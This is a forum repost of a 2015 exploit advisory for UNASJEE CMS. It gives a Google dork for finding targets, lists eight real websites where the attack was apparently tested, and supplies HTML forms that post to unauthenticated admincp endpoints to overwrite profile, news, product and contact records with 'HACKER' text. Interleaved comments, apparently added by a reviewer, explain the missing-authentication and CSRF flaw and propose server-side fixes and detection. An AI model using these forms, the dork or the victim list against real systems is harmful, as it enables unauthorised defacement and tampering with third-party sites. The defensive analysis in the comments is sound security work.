Aerosol Posted March 24, 2015 Report Posted March 24, 2015 .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ UNASJEE CMS -> Admin Panel CSRF Vulnerability PoC Exploits~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[+] Discovered by: KnocKout[~] Contact : knockout@e-mail.com.tr[~] HomePage : http://h4x0resec.blogspot.com############################################################Greetz: KedAns-Dz & DaiMon & _UnDeRTaKeR_ & BARCOD3 & Septemb0x & ZoRLu http://milw00rm.com / http://fiXen.org ############################################################~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~Web App. : UNASJEE CMS|~Affected Version : All Version|~Vendor : http://www.unasjee.net/|~DORK : intext:Designed & Developed by: UNASJEE|~RISK : High|~Date: 22.03.2015|~Tested On : [L] Kali Linux####################INFO################################admin panel without login It is possible to post datathe server will accept absolute.########################################################Demo and Tested on;http://turnnersports.comhttp://www.badhawaind.comhttp://www.cliftonintl.comhttp://www.aqnaf.comhttp://shanisports.comhttp://tayyabgarments.comhttp://www.shreentrader.comhttp://www.moosaleathers.com-------------------------------------------------------------------------------------------------------------------- Change Profile Detai PoC----------------------------------------------------------
<!-- Review note: the INFO section above states that the admincp handlers accept POST data "without login". That is a missing-authentication (broken access control) flaw in the handlers themselves, not only CSRF; the cross-site form below is just the simplest way to demonstrate it, and it would still work against a logged-in admin if a session check were added without a token. Server-side fix for every state-changing admincp/*.php named on this page (updprofile.php, addnews.php, addmainsection.php, updcontact.php): reject the request unless an authenticated admin session exists, require a per-session anti-CSRF token in each form and compare it on POST, and send the session cookie with a SameSite attribute; checking Origin/Referer on POST is useful defence in depth. Detection: a POST to admincp/ with no valid session cookie, or with a cross-site Origin/Referer, is the signal to alert on. "Affected Version : All Version" and "RISK : High" are the author's claims and are not verified here. -->
<!-- Change Profile Detail --> <body> <form action="http://[TARGET]/admincp/updprofile.php" method="POST"> <input type="hidden" name="pfid" value="1" /> <input type="hidden" name="sFullDescription" value="HACKERRRRRRR" /> <input type="hidden" name="p1" value="HACKERRRRRRR" /> <input type="hidden" 
name="Submit" value="Submit" /> <input type="submit" value="Submit request" /> </form> </body></html>---------------------------------------------------------- Add News PoC ----------------------------------------------------------
<!-- Review note: this and the next two "PoCs" are not self-contained pages; they are the admin panel's own form markup pasted with the action rewritten to http://[TARGET]/... (note the relative img/ assets, the onSubmit handlers checknForm and checkmsecForm that exist only in the panel's JavaScript, and the dangling </table></td></tr> fragments). The request a defender has to handle is the same as for updprofile.php: a POST to admincp/addnews.php carrying ntitle, nDate and news with no authenticated session. The "(YYYY-MM-DD)" hint and the onSubmit check are client-side only, so date and content validation must also happen in the handler. -->
<form name="frmnews" method="post" action="http://[TARGET]/admincp/addnews.php" onSubmit="return checknForm();"> <tr> <td valign="top" bgcolor="E8EEF3"><strong> Title: </strong><span class="error">*</span> </td> <td valign="top" bgcolor="E8EEF3"> <input name="ntitle" type="text" class="txtdefault" id="ntitle"> </td> </tr> <tr> <td valign="top" bgcolor="E8EEF3"><strong> Date: </strong><span class="error">*</span></td> <td valign="top" bgcolor="E8EEF3"> <input name="nDate" type="text" class="txtdefault" id="nDate"> (YYYY-MM-DD)</td> </tr> <tr> <td width="25%" valign="top" bgcolor="E8EEF3"><strong> News:<span class="error"> </span></strong><span class="error">*</span></td> <td width="75%" valign="top" bgcolor="E8EEF3"> <textarea name="news" cols="30" rows="5" class="txtnews1" id="textarea"></textarea></td> </tr> <tr> <td bgcolor="E8EEF3"> </td> <td bgcolor="E8EEF3"><input type="image" src="img/add_news.jpg" width="77" height="24"></td> </tr> </form> </table></td> </tr> </table></td> </tr> <tr> <td align="center"><img src="imgs/spacer.GIF" width="1" height="30"></td> </tr> </table></td> </tr> </table></td> </tr> <tr>---------------------------------------------------------- Add Products PoC ----------------------------------------------------------
<!-- Review note: addmainsection.php additionally accepts a file upload (bFile, enctype multipart/form-data). Beyond the session and token checks, the handler must validate the uploaded file server-side (allowed image types decided by content rather than extension, a size limit, a generated filename, storage outside any script-executable path). None of that can be inferred from this page, so treat it as a point to verify in the handler, not as a confirmed second flaw. -->
<td valign="top"><table width="450" border="0" cellpadding="1" cellspacing="2"> <form action="http://[TARGET]/admincp/addmainsection.php" enctype="multipart/form-data" method="post" name="frmnews" onSubmit="return checkmsecForm();"> <tr> <td width="29%" valign="top" bgcolor="E8EEF3"> <strong>Name:</strong></td> <td width="71%" valign="top" bgcolor="E8EEF3"><input name="SecName" type="text" class="txtdefault" id="SecName"> <font color="#FF0000">*</font></td> </tr> <tr> <td bgcolor="E8EEF3"> 
<strong>Show:</strong></td> <td bgcolor="E8EEF3"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="6%"><input name="show" type="radio" value="y" checked></td> <td width="13%">Yes</td> <td width="5%"><input type="radio" name="show" value="n"></td> <td width="76%">No</td> </tr> </table></td> </tr> <tr> <td bgcolor="E8EEF3"> <strong> Category Image:</strong></td> <td bgcolor="E8EEF3"><input name="bFile" type="file" class="txtfilefield1" id="bFile"> 70 x 62 px</td> </tr> <tr> <td bgcolor="E8EEF3"> </td> <td bgcolor="E8EEF3"><input type="image" src="img/addmain_section.jpg" width="121" height="24"></td> </tr> </form> </table></td> </tr> </table></td> </tr> <tr> ---------------------------------------------------------- Change Contact Details PoC----------------------------------------------------------
<!-- Review note: updcontact.php takes the record id from the client (hidden cid=1), exactly as updprofile.php does with pfid=1. If the handler selects the row by that id with no authorisation check, the same request can overwrite other records as well (IDOR); whether it does cannot be confirmed from this page. The remaining fields (cp1, email1, web, skype, haddress, ...) are free text that the public site presumably renders; confirm they are output-encoded on display, otherwise an unauthenticated write here also becomes stored XSS on the public pages. -->
<form name="form1" method="post" action="http://[TARGET]/admincp/updcontact.php" > <input type="hidden" name="cid" value="1"> <table align=center width=525> <tr style="background-color:#B0B0B0; font-family:verdana; font-size:11; font-weight:bold; color:white"> <td height="25" colspan=3><div align="center">Change your Contact Detail:</div></td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> First Contact Person:</td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Contact Person:</td> <td width="75%"> <input name=cp1 type=text id="cp1" value="HACKER"></td> <td width="16"> </td> </tr> <tr> <td width="35%">Designation:</td> <td width="75%"><input name=cpd1 type=text id="cpd1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%">Mobile:</td> <td width="75%"><input name=cpm1 type=text id="cpm1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> Second Contact Person:</td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Contact Person:</td> <td width="75%"><input name=cp2 type=text id="cp2" 
value=""></td> <td> </td> </tr> <tr> <td width="35%">Designation:</td> <td width="75%"><input name=cpd2 type=text id="cpd2" value=""></td> <td> </td> </tr> <tr> <td width="35%">Mobile:</td> <td width="75%"><input name=cpm2 type=text id="cpm2" value=""></td> <td> </td> </tr> <tr> <td width="35%" height="25" bgcolor="#CCCCCC"> Third Contact Person:</td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Contact Person:</td> <td width="75%"><input name=cp3 type=text id="cp3" value=""></td> <td> </td> </tr> <tr> <td width="35%">Designation:</td> <td width="75%"><input name=cpd3 type=text id="cpd3" value=""></td> <td> </td> </tr> <tr> <td width="35%">Mobile:</td> <td width="75%"><input name=cpm3 type=text id="cpm3" value=""></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Phone I:</td> <td width="75%"><input name=ph1 type=text id="ph1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%">Phone II:</td> <td width="75%"><input name=ph2 type=text id="ph2" value=""></td> <td> </td> </tr> <tr> <td width="35%">Phone III:</td> <td width="75%"><input name=ph3 type=text id="ph3" value=""></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Fax I:</td> <td width="75%"><input name=fax1 type=text id="fax1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">E - Mail I:</td> <td width="75%"><input name=email1 type=text id="email1" value="HACKER"></td> <td> </td> </tr> <tr> <td width="35%">E - Mail II:</td> <td width="75%"><input name=email2 type=text id="email2" value=""></td> <td> </td> </tr> <tr> <td width="35%">E - Mail II:</td> <td width="75%"><input name=email3 type=text id="email3" value=""></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"> </td> <td> </td> </tr> <tr> <td width="35%">Web Site:</td> <td width="75%"><input name=web type=text id="web" 
value="HACKER"></td> <td> </td> </tr> <tr> <td> </td> <td> </td> <td> </td> </tr> <tr> <td>Skype:</td> <td><input name=skype type=text id="skype" value=""></td> <td> </td> </tr> <tr> <td>Yahoo:</td> <td><input name=yahoo type=text id="yahoo" value=""></td> <td> </td> </tr> <tr> <td>gTalk:</td> <td><input name=gtalk type=text id="gtalk" value=""></td> <td> </td> </tr> <tr> <td>MSN:</td> <td><input name=msn type=text id="msn" value=""></td> <td> </td> </tr> <tr> <td> </td> <td> </td> <td> </td> </tr> <tr> <td width="35%"><div><strong>Asia Head Office Address:</strong></div> <br></td> <td width="75%"><textarea name=haddress cols=38 rows=4 id="haddress" >HACKER</textarea></td> <td> </td> </tr> <tr> <td width="35%"><strong>Hong Kong Office Address:</strong> </td> <td width="75%"><textarea name=faddress cols=38 rows=4 id="faddress" ></textarea></td> <td> </td> </tr> <tr> <td><strong>Australian Office Address:</strong></td> <td><textarea name=fax2 cols=38 rows=4 id="fax2" ></textarea></td> <td> </td> </tr> <tr> <td width="35%"> </td> <td width="75%"><input type="submit" name="Submit" value="Submit"> <input name="reset" type="reset" id="reset" value="Reset"></td> <td> </td> </tr> </table> </form>Source Quote